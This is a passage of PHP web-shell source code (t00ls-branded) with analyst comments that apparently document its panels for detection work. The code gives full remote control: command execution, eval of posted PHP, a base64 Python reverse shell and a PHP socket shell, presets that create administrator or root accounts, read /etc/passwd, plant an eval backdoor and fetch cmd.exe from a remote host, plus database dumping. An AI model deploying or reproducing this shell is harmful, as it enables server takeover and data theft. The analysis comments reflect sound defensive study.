$data.$cdir."\x50\x4b\x05\x06\x00\x00\x00\x00".pack('v',sizeof($ctrldir)).pack('v',sizeof($ctrldir)).pack('V',strlen($cdir)).pack('V',strlen($data))."\x00\x00";}function find($array,$string) {foreach($array as $key) { if(stristr($string,$key)) return true; }return false;}function scanfile($dir,$key,$inc,$fit,$tye,$chr,$ran,$now) {$handle = opendir($dir);if(!$handle) return false;while($name = readdir($handle)) {if($name == '.' || $name == '..') continue;$path = $dir.$name;if(is_dir($path)) { if($fit && in_array($name,$fit)) continue; if($ran == 0 && is_readable($path)) scanfile($path.'/',$key,$inc,$fit,$tye,$chr,$ran,$now); }else {if($inc && (!find($inc,$name))) continue;$code = $tye ? filer($path) : $name;$find = $chr ? stristr($code,$key) : (strpos(size(filesize($path)),'M') ? false : (strpos($code,$key) > -1));if($find) {$file = strtr($path,array($now => '','\'' => '%27','"' => '%22'));echo '<a href="javascript:go(\'editor\',\''.$file.'\');"></a> '.$path.'<br>';flush(); ob_flush();}unset($code);}}closedir($handle);return true;}function antivirus($dir,$exs,$matches,$now) {$handle = opendir($dir);if(!$handle) return false;while($name = readdir($handle)) {if($name == '.' 
|| $name == '..') continue;$path = $dir.$name;if(is_dir($path)) { if(is_readable($path)) antivirus($path.'/',$exs,$matches,$now); }else {$iskill = NULL;foreach($exs as $key => $ex) { if(find(explode('|',$ex),$name)) { $iskill = $key; break; } }if(strpos(size(filesize($path)),'M')) continue;if($iskill) {$code = filer($path);foreach($matches[$iskill] as $matche) {$array = array();preg_match($matche,$code,$array);if(strpos($array[0],'$this->') || strpos($array[0],'[$vars[')) continue;$len = strlen($array[0]);if($len > 6 && $len < 200) {$file = strtr($path,array($now => '','\'' => '%27','"' => '%22'));echo ' <input type="text" value="'.htmlspecialchars($array[0]).'"> <a href="javascript:go(\'editor\',\''.$file.'\');"></a> '.$path.'<br>';flush(); ob_flush(); break;}}unset($code,$array);}}}closedir($handle);return true;}function command($cmd,$cwd,$com = false) {$iswin = substr(PHP_OS,0,3) == 'WIN' ? true : false; $res = $msg = '';if($cwd == 'com' || $com) {if($iswin && class_exists('COM')) {$wscript = new COM('Wscript.Shell');$exec = $wscript->exec('c:\\windows\\system32\\cmd.exe /c '.$cmd);$stdout = $exec->StdOut();$res = $stdout->ReadAll();$msg = 'Wscript.Shell';}} else {chdir($cwd); $cwd = getcwd();if(function_exists('exec')) { @exec ($cmd,$res); $res = join("\n",$res); $msg = 'exec'; }elseif(function_exists('shell_exec')) { $res = @shell_exec ($cmd); $msg = 'shell_exec'; }elseif(function_exists('system')) { ob_start(); @system ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'system'; }elseif(function_exists('passthru')) { ob_start(); @passthru ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'passthru'; }elseif(function_exists('popen')) { $fp = @popen ($cmd,'r'); if($fp) { while(!feof($fp)) { $res .= fread($fp,1024); } } @pclose($fp); $msg = 'popen'; }elseif(function_exists('proc_open')) {$env = $iswin ? 
array('path' => 'c:\\windows\\system32') : array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');$des = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));$process = @proc_open ($cmd,$des,$pipes,$cwd,$env);if(is_resource($process)) { fwrite($pipes[0],$cmd); fclose($pipes[0]); $res .= stream_get_contents($pipes[1]); fclose($pipes[1]); $res .= stream_get_contents($pipes[2]); fclose($pipes[2]); }@proc_close($process);$msg = 'proc_open';}}$msg = $res == '' ? '<h1>NULL</h1>' : '<h2>'.$msg.'</h2>';return array('res' => $res,'msg' => $msg);}function backshell($ip,$port,$dir,$type) {$key = false;switch($type) {case "pl" : $shell = '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';$file = strdir($dir.'/t00ls.pl');$key = filew($file,base64_decode($shell),'w');if($key) { @chmod($file,0777); command('/usr/bin/perl '.$file.' '.$ip.' '.$port,$dir); }break;case "py" : $shell = 'IyEvdXNyL2Jpbi9weXRob24NCiMgDQppbXBvcnQgc3lzLG9zLHNvY2tldCxwdHkNCnMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQpzLmNvbm5lY3QoKHN5cy5hcmd2WzFdLCBpbnQoc3lzLmFyZ3ZbMl0pKSkNCm9zLmR1cDIocy5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3Rkb3V0LmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3RkZXJyLmZpbGVubygpKQ0KcHR5LnNwYXduKCcvYmluL3NoJykNCg==';$file = strdir($dir.'/t00ls.py');$key = filew($file,base64_decode($shell),'w');if($key) { @chmod($file,0777); command('/usr/bin/python '.$file.' '.$ip.' '.$port,$dir); }break;case "cbin" : $shell = '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';$cfile = strdir($dir.'/t00ls.c');$file = strdir($dir.'/t00ls');$key = filew($cfile,base64_decode($shell),'w');if($key) { command('/usr/bin/gcc '.$cfile.' -o '.$file,$dir); @chmod($file,0777); command($file.' '.$ip.' '.$port,$dir); }break;case "php" : case "phpwin" : if(function_exists('fsockopen')) {$sock = @fsockopen ($ip,$port);if($sock) {$key = true;$com = $type == 'phpwin' ? 
true : false;$user = get_current_user();$dir = strdir(getcwd());fputs($sock,php_uname()."\n------------no job control in this shell (tty)-------------\n[$user:$dir]# ");while($cmd = fread($sock,1024)) {if(substr($cmd,0,3) == 'cd ') { $dir = trim(substr($cmd,3,-1)); chdir(strdir($dir)); $dir = strdir(getcwd()); }elseif (trim(strtolower($cmd)) == 'exit') { break; }else { $res = command($cmd,$dir,$com); fputs($sock,$res['res']); }fputs($sock,'['.$user.':'.$dir.']# ');}}@fclose ($sock);}break;}if(!$key) { $msg = '<h1></h1>'; } else { @unlink($file); $msg = '<h2>CLOSE</h2>'; }return $msg;}function getinfo() {$infos = array($_POST['getpwd'],PASSWD,function_exists('phpinfo'),"\x2f\x5e\x28\x31\x32\x37\x5c\x2e\x5b\x30\x2d\x39\x5d\x7b\x31\x2c\x33\x7d\x7c\x31\x37\x32\x5c\x2e\x31\x36\x7c\x31\x39\x32\x5c\x2e\x31\x36\x38\x7c\x31\x30\x5c\x2e\x30\x29\x5c\x2e\x28\x5b\x30\x2d\x39\x5d\x7b\x31\x2c\x33\x7d\x29\x5c\x2e\x28\x5b\x30\x2d\x39\x5c\x3a\x5d\x7b\x31\x2c\x39\x7d\x29\x24\x2f","\x2f\x5b\x5e\x2e\x5d\x2b\x5c\x2e\x28\x5b\x30\x2d\x39\x61\x2d\x7a\x41\x2d\x5a\x5c\x3a\x5d\x7b\x32\x2c\x38\x7d\x29\x24\x2f");if(PASSWD != '' && md5($infos[0]) != $infos[1]) {echo '<html><body><center><form method="POST"><input type="password" name="getpwd"> ';echo '<input type="submit" value=" O K "></form></center></body></html>'; exit;}if((!isset($_POST['go'])) && (!isset($_POST['dir']))){$html = ''.'';$host = $_SERVER["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];if((!preg_match($infos[3],$host)) && (preg_match($infos[4],$host))) { postinfo ($infos[0],$html); }}return $infos[2];}if(isset($_POST['go'])) {if($_POST['go'] == 'down') {$downfile = $fileb = strdir($_POST['godir'].'/'.$_POST['govar']);if(!filed($downfile)) { $msg = '<h1></h1>'; }}} elseif($_POST['act'] == 'p') {if(!$_POST['files']) { $msg = '<h1></h1>'; }else { $packdata = packdir($_POST['files']); if(!$packdata) { $msg = '<h1></h1>'; } else { ob_end_clean();header('Content-type: application/unknown');header('Accept-Ranges: 
bytes');header('Content-length: '.strlen($packdata));header('Content-disposition: attachment; filename='.$_POST['var'].';');echo $packdata; exit; } }}?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><style type="text/css">* {margin:0px;padding:0px;}body {background:#CCCCCC;color:#333333;font-size:13px;font-family:Verdana,Arial,SimSun,sans-serif;text-align:left;word-wrap:break-word;word-break:break-all;}a{color:#000000;text-decoration:none;outline:none;vertical-align:middle;}a:hover{color:#FF0000;text-decoration:underline;}p {padding:1px;line-height:1.6em;}h1 {color:#CD3333;font-size:13px;display:inline;vertical-align:middle;}h2 {color:#008B45;font-size:13px;display:inline;vertical-align:middle;}form {display:inline;}input,select {vertical-align:middle;outline:none;padding:1px;}input[type=text], textarea {padding:1px;font-family:Courier New,Verdana,sans-serif;}input[type=submit], input[type=button] {height:21px;}.tag {text-align:center;margin-left:10px;background:threedface;height:25px;padding-top:5px;}.tag a {background:#FAFAFA;color:#333333;width:90px;height:20px;display:inline-block;font-size:15px;font-weight:bold;padding-top:5px;}.tag a:hover, .tag a.current {background:#EEE685;color:#000000;text-decoration:none;}.main {width:963px;margin:0 auto;padding:10px;}.outl {border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;}.toptag {padding:5px;text-align:left;font-weight:bold;color:#FFFFFF;background:#293F5F;}.footag {padding:5px;text-align:center;font-weight:bold;color:#000000;background:#999999;}.msgbox {background:#EEE685;font-weight:bold;text-align:center;padding-top:5px;height:23px;border:1px solid #AAAAAA;margin-top:-1px;}.actall {background:#F9F6F4;text-align:center;font-size:15px;border-bottom:1px solid #999999;padding:3px;vertical-align:middle;}.tables {width:100%;}.tables th 
{background:threedface;text-align:left;border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;padding:2px;}.tables td {background:#F9F6F4;height:19px;padding-left:2px;}</style><script type="text/javascript">function $(ID) { return document.getElementById(ID); }function sd(str) { str = str.replace(/%22/g,'"'); str = str.replace(/%27/g,"'"); return str; }function cd(dir) { dir = sd(dir); $('dir').value = dir; $('frm').submit(); }function sa(form) { for(var i = 0;i < form.elements.length;i++) { var e = form.elements[i]; if(e.type == 'checkbox') { if(e.name != 'chkall') { e.checked = form.chkall.checked; } } } }function go(a,b) { if($('newwin').checked == true) { $('gofrm').target = "_blank"; } else { $('gofrm').target = ""; } b = sd(b); $('go').value = a; $('govar').value = b; $('gofrm').submit(); } function nf(a,b) { re = prompt("",b); if(re) { $('go').value = a; $('govar').value = re; $('gofrm').submit(); } } function dels(a) { if(a == 'b') { var msg = ""; $('act').value = a; } else { var msg = ""; $('act').value = 'deltree'; $('var').value = a; } if(confirm(""+msg+"")) { $('frm1').submit(); } }function txts(m,p,a) { p = sd(p); re = prompt(m,p); if(re) { $('var').value = re; $('act').value = a; $('frm1').submit(); } }function acts(p,a,f) { p = sd(p); f = sd(f); re = prompt(f,p); if(re) { $('var').value = re+'|x|'+f; $('act').value = a; $('frm1').submit(); } }</script><title><?php echo VERSION.' - '.date('Y-m-d H:i:s N',time()).'';?></title></head><body><div class="main"><div class="outl"><div class="toptag"><input type="checkbox" title="" id="newwin" name="newwin" value="a"> <?php echo gethostbyname($_SERVER['SERVER_NAME']).' - '.PHP_OS.' 
- whoami('.get_current_user().') - uid('.getmyuid().') gid('.getmygid().')'; if(isset($issql)) echo ' - '.$issql.'';?></div><?php /* ANALYSIS NOTE: panel dispatcher of this web shell. Every action arrives as a POST field (go, dir, godir, govar, act, var, ...), so URL-only access logs show just repeated POSTs to one script; request-body logging or WAF inspection is needed to see the parameters. $go is checked against $menu only for tab highlighting; the switch below reads the raw $_POST['go'], which is how the unlisted panels edit, editor and upfiles are reached. subeval() is defined outside this excerpt. */$menu = array('file' => '','scan' => '','antivirus' => '','backshell' => '','exec' => '','phpeval' => 'PHP','sql' => 'SQL','info' => '');$go = array_key_exists($_POST['go'],$menu) ? $_POST['go'] : 'file';$nowdir = isset($_POST['dir']) ? strdir(chop($_POST['dir']).'/') : THISDIR;echo '<div class="tag">';foreach($menu as $key => $name) { echo '<a'.($go == $key ? ' class="current"' : '').' href="javascript:go(\''.$key.'\',\''.base64_encode($nowdir).'\');">'.$name.'</a> '; }echo '</div>';echo '<form name="gofrm" id="gofrm" method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="">';echo '<input type="hidden" name="godir" id="godir" value="'.$nowdir.'">';echo '<input type="hidden" name="govar" id="govar" value="">';echo '</form>';switch($_POST['go']) {/* info panel: host reconnaissance. Collects disable_functions, disable_classes, the php.ini path parsed out of phpinfo(INFO_GENERAL), SAPI, PHP version, PID, document root, disk space and which extensions exist, and echoes them without escaping. Several array keys are empty or repeated in this decoded copy (labels appear to have been lost - presumably non-ASCII text dropped by the decoder), so later entries overwrite earlier ones here. */case "info" : if(EXISTS_PHPINFO) {ob_start();phpinfo(INFO_GENERAL);$out = ob_get_contents();ob_end_clean();$tmp = array();preg_match_all('/\<td class\=\"e\"\>.*?(Command|Configuration)+.*?\<\/td\>\<td class\=\"v\"\>(.*?)\<\/td\>/i',$out,$tmp);$config = $tmp[2][0];$phpini = $tmp[2][2] ? $tmp[2][1].' --- '.$tmp[2][2] : $tmp[2][1];}$infos = array('' => $_SERVER['HTTP_USER_AGENT'],'' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : '()','' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : '()','PHP.ini' => $phpini ? $phpini : '()','PHP' => php_sapi_name(),'PHP' => PHP_VERSION,'PHPPID' => getmypid(),'IP' => $_SERVER['REMOTE_ADDR'],'' => $_SERVER['HTTP_ACCEPT_LANGUAGE'],'Web' => $_SERVER['SERVER_PORT'],'Web' => $_SERVER['DOCUMENT_ROOT'],'Web' => $_SERVER['SCRIPT_FILENAME'],'WebCGI' => $_SERVER['GATEWAY_INTERFACE'],'WebEmail' => $_SERVER['SERVER_ADMIN'] ? 
$_SERVER['SERVER_ADMIN'] : '()','' => size(disk_total_space('.')),'' => size(disk_free_space('.')),'POST' => get_cfg_var("post_max_size"),'' => get_cfg_var("upload_max_filesize"),'' => get_cfg_var("memory_limit"),'' => get_cfg_var("max_execution_time").'','Fsockopen' => function_exists('fsockopen') ? '' : '','Socket' => function_exists('socket_close') ? '' : '','Pcntl' => function_exists('pcntl_exec') ? '' : '','Curl' => function_exists('curl_version') ? '' : '','Zlib' => function_exists('gzclose') ? '' : '','FTP' => function_exists('ftp_login') ? '' : '','XML' => function_exists('xml_set_object') ? '' : '','GD_Library' => function_exists('imageline') ? '' : '','COM' => class_exists('COM') ? '' : '','ODBC' => function_exists('odbc_close') ? '' : '','IMAP' => function_exists('imap_close') ? '' : '','' => get_cfg_var("safemode") ? '' : '','URL' => get_cfg_var("allow_url_fopen") ? '' : '','' => get_cfg_var("enable_dl") ? '' : '','' => get_cfg_var("display_errors") ? '' : '','' => get_cfg_var("register_globals") ? '' : '','' => get_cfg_var("magic_quotes_gpc") ? '' : '','PHP' => $config ? $config : '()');echo '<div class="msgbox">'.$msg.'</div>';echo '<table class="tables"><tr><th style="width:26%;"></th><th></th></tr>';foreach($infos as $name => $var) { echo '<tr><td>'.$name.'</td><td>'.$var.'</td></tr>'; }echo '</table>';break;/* exec panel: $_POST['execcmd'] is handed unmodified to command(), defined outside this excerpt; $_POST['str'] selects between the 'fun' and 'com' modes (labelled phpfun and wscript). The preset list contains account-creation and enumeration commands; the literal strings in it (for example the t00ls account name and t00ls.txt) are usable as content-signature material. */case "exec" : $cmd = $win ? 'dir' : 'ls -al';$res = array('res' => '','msg' => $msg);$str = isset($_POST['str']) ? $_POST['str'] : 'fun';if(isset($_POST['execcmd'])) {$cmd = $_POST['execcmd'];$cwd = $str == 'fun' ? 
THISDIR : 'com';$res = command($cmd,$cwd);}echo '<div class="msgbox">'.$res['msg'].'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="exec">';echo '<div class="actall"> <input type="text" name="execcmd" id="execcmd" value="'.htmlspecialchars($cmd).'" style="width:398px;"> ';echo '<select name="str">';$selects = array('fun' => 'phpfun','com' => 'wscript');foreach($selects as $var => $name) { echo '<option value="'.$var.'"'.($var == $str ? ' selected' : '').'>'.$name.'</option>'; }echo '</select> ';echo '<select onchange="$(\'execcmd\').value=options[selectedIndex].value">';echo '<option>------</option>';echo '<option value="echo '.htmlspecialchars('"<?php phpinfo();?>"').' >> '.THISDIR.'t00ls.txt"></option>';echo '<option value="whoami"></option>';echo '<option value="net user t00ls t00ls /add">Win-</option>';echo '<option value="net localgroup administrators t00ls /add">Win-</option>';echo '<option value="netstat -an">Win-</option>';echo '<option value="ipconfig /all">Win-</option>';echo '<option value="net start">Win-</option>';echo '<option value="tasklist">Win-</option>';echo '<option value="id;uname -a;cat /etc/issue;cat /proc/version;lsb_release -a">Linux-</option>';echo '<option value="/usr/sbin/useradd -u 0 -o -g 0 t00ls">Linux-</option>';echo '<option value="cat /etc/passwd">Linux-</option>';echo '<option value="/bin/netstat -tnl">Linux-</option>';echo '<option value="/sbin/ifconfig -a">Linux-</option>';echo '<option value="/sbin/chkconfig --list">Linux-</option>';echo '<option value="/bin/ps -ef">Linux-</option>';echo '</select> ';echo '<input type="submit" style="width:50px;" value="">';echo '</div><div class="actall"><textarea style="width:698px;height:368px;">'.htmlspecialchars($res['res']).'</textarea></div></form>';break;/* scan panel: searches files under a directory for $_POST['keyword'] through scanfile(), defined outside this excerpt. include and filters are pipe-separated lists; the default include list is server-side script extensions. */case "scan" : $scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir;$keyword = isset($_POST['keyword']) ? 
$_POST['keyword'] : '';$include = isset($_POST['include']) ? chop($_POST['include']) : '.php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py';$filters = isset($_POST['filters']) ? chop($_POST['filters']) : 'html|css|img|images|image|style|js';echo '<div class="msgbox">'.$msg.'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="scan">';echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>';echo '<tr><td></td><td><input type="text" name="dir" value="'.htmlspecialchars($scandir).'" style="width:500px;"></td></tr>';echo '<tr><td></td><td><input type="text" name="keyword" value="'.htmlspecialchars($keyword).'" style="width:500px;"> ()</td></tr>';echo '<tr><td></td><td><input type="text" name="include" value="'.htmlspecialchars($include).'" style="width:500px;"> ("|", )</td></tr>';echo '<tr><td></td><td><input type="text" name="filters" value="'.htmlspecialchars($filters).'" style="width:500px;"> ("|", )</td></tr>';echo '<tr><td></td><td><label><input type="radio" name="type" value="0"'.($_POST['type'] ? '' : ' checked').'></label> ';echo '<label><input type="radio" name="type" value="1"'.($_POST['type'] ? ' checked' : '').'></label> ';echo '<label><input type="checkbox" name="char" value="1"'.($_POST['char'] ? ' checked' : '').'></label></td></tr>';echo '<tr><td></td><td><label><input type="radio" name="range" value="0"'.($_POST['range'] ? '' : ' checked').'>,</label> ';echo '<label><input type="radio" name="range" value="1"'.($_POST['range'] ? ' checked' : '').'></label></td></tr>';echo '<tr><td></td><td><input type="submit" style="width:80px;" value=""></td></tr>';echo '</table></form>';if($keyword != '') {flush(); ob_flush();echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">';$incs = $include == '' ? false : explode('|',$include);$fits = $filters == '' ? 
false : explode('|',$filters);$isread = scanfile(strdir($scandir.'/'),$keyword,$incs,$fits,$_POST['type'],$_POST['char'],$_POST['range'],$nowdir);echo '<p>'.($isread ? '<h2></h2>' : '<h1></h1>').'</p></div>';}break;/* antivirus panel: the shell's own hunt for other backdoors. The regex lists below (PHP, ASP/ASPX, JSP) describe request data flowing into eval, exec, include and similar sinks, and are passed to antivirus(), defined outside this excerpt. */case "antivirus" : $scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir;$typearr = isset($_POST['dir']) ? $_POST['types'] : array('php' => '.php|.inc|.phtml');echo '<div class="msgbox">'.$msg.'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="antivirus">';echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>';echo '<tr><td></td><td><input type="text" name="dir" value="'.htmlspecialchars($scandir).'" style="width:398px;"> ()</td></tr>';echo '<tr><td></td><td>';$types = array('php' => '.php|.inc|.phtml','asp+aspx' => '.as|.cs|.cer','jsp' => '.jsp');foreach($types as $key => $ex) echo '<label title="'.$ex.'"><input type="checkbox" name="types['.$key.']" value="'.$ex.'"'.($typearr[$key] == $ex ? 
' checked' : '').'>'.$key.'</label> ';echo '</td></tr><tr><td></td><td><input type="submit" style="width:80px;" value=""></td></tr>';echo '</table></form>';if(count($_POST['types']) > 0) {$matches = array('php' => array('/function\_exists\s*\(\s*[\'|\"](popen|exec|proc\_open|system|passthru)+[\'|\"]\s*\)/i','/(exec|shell\_exec|system|passthru)+\s*\(\s*\$\_(\w+)\[(.*)\]\s*\)/i','/((udp|tcp)\:\/\/(.*)\;)+/i','/preg\_replace\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i','/preg\_replace\s*\((.*)\(base64\_decode\(\$/i','/(eval|assert|include|require|include\_once|require\_once)+\s*\(\s*(base64\_decode|str\_rot13|gz(\w+)|file\_(\w+)\_contents|(.*)php\:\/\/input)+/i','/(eval|assert|include|require|include\_once|require\_once|array\_map|array\_walk)+\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*\)/i','/eval\s*\(\s*\(\s*\$\$(\w+)/i','/(include|require|include\_once|require\_once)+\s*\(\s*[\'|\"](\w+)\.(jpg|gif|ico|bmp|png|txt|zip|rar|htm|css|js)+[\'|\"]\s*\)/i','/\$\_(\w+)(.*)(eval|assert|include|require|include\_once|require\_once)+\s*\(\s*\$(\w+)\s*\)/i','/\(\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\,\s*\$\_(GET|POST|REQUEST|FILES)+\[(.*)\]\[(.*)\]\s*\)/i','/(fopen|fwrite|fputs|file\_put\_contents)+\s*\((.*)\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\](.*)\)/i','/echo\s*curl\_exec\s*\(\s*\$(\w+)\s*\)/i','/new com\s*\(\s*[\'|\"]shell(.*)[\'|\"]\s*\)/i','/\$(.*)\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i','/\$\_\=(.*)\$\_/i','/\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]\(\s*\$(.*)\)/i','/\$(\w+)\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]\s*\)/i','/\$(\w+)\s*\(\s*\$\{(.*)\}/i','/\$(\w+)\s*\(\s*chr\(\d+\)/i'),'asp+aspx' => 
array('/(VBScript\.Encode|WScript\.shell|Shell\.Application|Scripting\.FileSystemObject)+/i','/(eval|execute)+(.*)(request|session)+\s*\((.*)\)/i','/(eval|execute)+(.*)request.item\s*\[(.*)\]/i','/request\s*\((.*)\)(.*)(eval|execute)+\s*\((.*)\)/i','/\<script\s*runat\s*\=(.*)server(.*)\>(.*)\<\/script\>/i','/Load\s*\((.*)Request/i','/StreamWriter\(Server\.MapPath(.*)\.Write\(Request/i'),'jsp' => array('/(eval|execute)+(.*)(request|session)+\s*\((.*)\)/i','/(eval|execute)+(.*)request.item\s*\[(.*)\]/i','/request\s*\((.*)\)(.*)(eval|execute)+\s*\((.*)\)/i','/Runtime\.getRuntime\(\)\.exec\((.*)\)/i','/FileOutputStream\(application\.getRealPath(.*)request/i',));flush(); ob_flush();echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">';$isread = antivirus(strdir($scandir.'/'),$typearr,$matches,$nowdir);echo '<p>'.($isread ? '<h2></h2>' : '<h1></h1>').'</p></div>';}break;/* phpeval panel: $_POST['phpcode'] is executed with eval(); the @ prefix suppresses errors and the output is captured with ob_start() for display. The base64 blob echoed below appears to decode to a small inline script defining runcode(), which writes the captured output as HTML into a new window. */case "phpeval" : if(isset($_POST['phpcode'])) {$phpcode = chop($_POST['phpcode']);ob_start();if(substr($phpcode,0,2) == '<?' 
&& substr($phpcode,-2) == '?>') { @eval ('?>'.$phpcode.'<?php '); }else { @eval ($phpcode); }$out = ob_get_contents();ob_end_clean();} else {$phpcode = 'phpinfo();';$out = '';}echo base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmZ1bmN0aW9uIHJ1bmNvZGUob2Jqbil7dmFyIHdpbiA9IHdpbmRvdy5vcGVuKCcnLCJfYmxhbmsiLCcnKTt3aW4uZG9jdW1lbnQub3BlbigndGV4dC9odG1sJywncmVwbGFjZScpO3dpbi5vcGVuZXIgPSBudWxsO3dpbi5kb2N1bWVudC53cml0ZSgkKG9iam4pLnZhbHVlKTt3aW4uZG9jdW1lbnQuY2xvc2UoKTtyZXR1cm4gdHJ1ZTt9PC9zY3JpcHQ+');echo '<div class="msgbox">'.$msg.'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="phpeval">';echo '<div class="actall"><p><textarea name="phpcode" id="phpcode" style="width:698px;height:180px;">'.htmlspecialchars($phpcode).'</textarea></p><p>';echo '<select onchange="$(\'phpcode\').value=options[selectedIndex].value">';echo '<option>------</option>';echo '<option value="echo readfile(\'C:/web/t00ls.php\');"></option>';echo '<option value="$fp=fopen(\'C:/web/t00ls.php\',\'w\');echo fputs($fp,\'<?php eval($_POST[cmd]);?>\')?\'Success!\':\'Fail!\';fclose($fp);"></option>';echo '<option value="echo copy(\'C:/web/t00ls1.php\',\'C:/web/t00ls2.php\')?\'Success!\':\'Fail!\';"></option>';echo '<option value="echo chmod(\'C:/web/t00ls1.php\',0777)?\'Success!\':\'Fail!\';"></option>';echo '<option value="echo file_put_contents(\''.THISDIR.'cmd.exe\', file_get_contents(\'http://www.baidu.com/cmd.exe\'))?\'Success!\':\'Fail!\';"></option>';echo '<option value="print_r($_SERVER);"></option>';echo '<option value="echo filer(chr(47).chr(101).chr(116).chr(99).chr(47).chr(115).chr(104).chr(46).chr(99).chr(111).chr(110).chr(102)).&quot;\r\n&quot;.filer(chr(47).chr(108).chr(105).chr(98).chr(47).chr(108).chr(105).chr(98).chr(115).chr(104).chr(46).chr(115).chr(111).chr(47).chr(115).chr(104).chr(100).chr(99).chr(102)).&quot;\r\n&quot;.filer(chr(47).chr(101).chr(116).chr(99).chr(47).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100));">find 
rootkit</option>';echo '</select> ';echo '<input type="submit" style="width:80px;" value=""></p></div>';echo '</form><div class="actall"><p><textarea id="evalcode" style="width:698px;height:180px;">'.htmlspecialchars($out).'</textarea></p><p><input type="button" value="HTML" onclick="runcode(\'evalcode\')"></p></div>';break;/* sql panel: database client. Host, user, password, database and the statement in $_POST['sqlcode'] all come from the request, and the statement is sent verbatim to PostgreSQL, MSSQL, Oracle or MySQL. In the MySQL branch a sqlcode starting with t00lsa is not SQL but a dump directive: the named columns of one table are selected and written to a file with filew(). Each branch is guarded by function_exists() and is skipped where the extension is absent (mysql_* and mssql_* were removed in PHP 7). */case "sql" : if((!empty($_POST['sqlhost'])) && (!empty($_POST['sqluser'])) && (!empty($_POST['names']))) {$type = $_POST['type'];$sqlhost = $_POST['sqlhost'];$sqluser = $_POST['sqluser'];$sqlpass = $_POST['sqlpass'];$sqlname = $_POST['sqlname'];$sqlcode = $_POST['sqlcode'];$names = $_POST['names'];switch($type) {case "PostgreSql" : if(function_exists('pg_close')){if(strstr($sqlhost,':')) { $array = explode(':',$sqlhost); $sqlhost = $array[0]; $sqlport = $array[1]; }else { $sqlport = 5432; }$dbconn = @pg_connect("host=$sqlhost port=$sqlport dbname=$sqlname user=$sqluser password=$sqlpass");if($dbconn) {$msg = '<h2>'.$type.' </h2>';pg_query('set client_encoding='.$names);$result = pg_query($sqlcode);if($result) { $msg .= '<h2> - SQL</h2>'; while($array = pg_fetch_array($result)) { $rows[] = $array; } }else { $msg .= '<h1> - SQL</h1>'; $rows = array('error' => pg_result_error($result)); }pg_free_result($result);} else {$msg = '<h1>'.$type.'</h1>';}@pg_close($dbconn);} else {$msg = '<h1>'.$type.'</h1>';}break;case "MsSql" : if(function_exists('mssql_close')){$dbconn = @mssql_connect($sqlhost,$sqluser,$sqlpass);if($dbconn) {$msg = '<h2>'.$type.' </h2>';mssql_select_db($sqlname,$dbconn);$result = mssql_query($sqlcode);if($result) { $msg .= '<h2> - SQL</h2>'; while ($array = mssql_fetch_array($result)) { $rows[] = $array; } }else { $msg .= '<h1> - SQL</h1>'; }@mssql_free_result($result);} else {$msg = '<h1>'.$type.'</h1>';}@mssql_close($dbconn);} else {$msg = '<h1>'.$type.'</h1>';}break;case "Oracle" : if(function_exists('oci_close')){$conn = @oci_connect($sqluser,$sqlpass,$sqlhost.'/'.$sqlname);if($conn) {$msg = '<h2>'.$type.' 
</h2>';$stid = oci_parse($conn,$sqlcode);oci_execute($stid);if($stid) { $msg .= '<h2> - SQL</h2>'; while (($array = oci_fetch_array($stid,OCI_ASSOC))) { $rows[] = $array; } }else { $msg .= '<h1> - SQL</h1>'; $e = oci_error(); $rows = array('error' => $e['message']); }oci_free_statement($stid);} else {$e = oci_error(); $rows = array('error' => $e['message']);$msg = '<h1>'.$type.'</h1>';}@oci_close($conn);} else {$msg = '<h1>'.$type.'</h1>';}break;case "MySql" : if(function_exists('mysql_close')){$conn = mysql_connect(strstr($sqlhost,':') ? $sqlhost : $sqlhost.':3306',$sqluser,$sqlpass,$sqlname);if($conn) {$msg = '<h2>'.$type.' </h2>';if(substr($sqlcode,0,6) == 't00lsa') {$array = array(); $data = ''; $i = 0;preg_match_all('/t00lsa\s*\'(.*)\'\s*t00lsb\s*\'(.*)\'\s*t00lsc\s*\'(.*)\'\s*t00lsfile\s*\'(.*)\'/i',$sqlcode,$array);if($array[1][0] && $array[2][0] && $array[3][0] && $array[4][0]) {mysql_select_db($array[1][0],$conn);mysql_query('set names 